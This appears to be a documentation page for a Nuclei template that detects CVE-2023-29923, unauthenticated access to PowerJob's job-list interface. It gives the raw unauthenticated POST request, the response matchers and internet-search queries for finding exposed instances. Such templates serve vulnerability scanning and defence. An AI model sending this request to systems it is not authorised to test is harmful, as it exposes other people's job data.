PowerJob <=4.3.2 - Unauthenticated Access
ID: CVE-2023-29923
Severity: medium
Author: For3stCo1d
Tags: cve2023,cve,powerjob,unauth
Description
Section titled “Description”PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
YAML Source
Section titled “YAML Source”id: CVE-2023-29923
info: name: PowerJob <=4.3.2 - Unauthenticated Access author: For3stCo1d severity: medium description: | PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface. impact: | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade PowerJob to a version higher than 4.3.2 or apply the necessary patches to fix the authentication bypass issue. reference: - https://github.com/PowerJob/PowerJob/issues/587 - https://nvd.nist.gov/vuln/detail/CVE-2023-29923 - https://github.com/KayCHENvip/vulnerability-poc - https://github.com/Le1a/CVE-2023-29923 - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-29923 cwe-id: CWE-276 epss-score: 0.01633 epss-percentile: 0.8751 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: powerjob product: powerjob shodan-query: http.html:"powerjob" fofa-query: - app="PowerJob" - app="powerjob" - body="powerjob" tags: cve2023,cve,powerjob,unauth
http: - raw: - | POST /job/list HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8
{"appId":1,"index":0,"pageSize":10}
matchers-condition: and matchers: - type: word part: body words: - '{"success":true,"data":{"index":0,"pageSize":10,'
- type: word part: header words: - "application/json"
- type: status status: - 200# digest: 4a0a0047304502204544e212518ffafe5d535da114d3cc4d167f0decf06d35fb148bdd977874ea97022100a866bbca3eaa1d610fe824460e6a0b1fa6832738a588ce2fe40d3eadf122b4c1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-29923.yaml"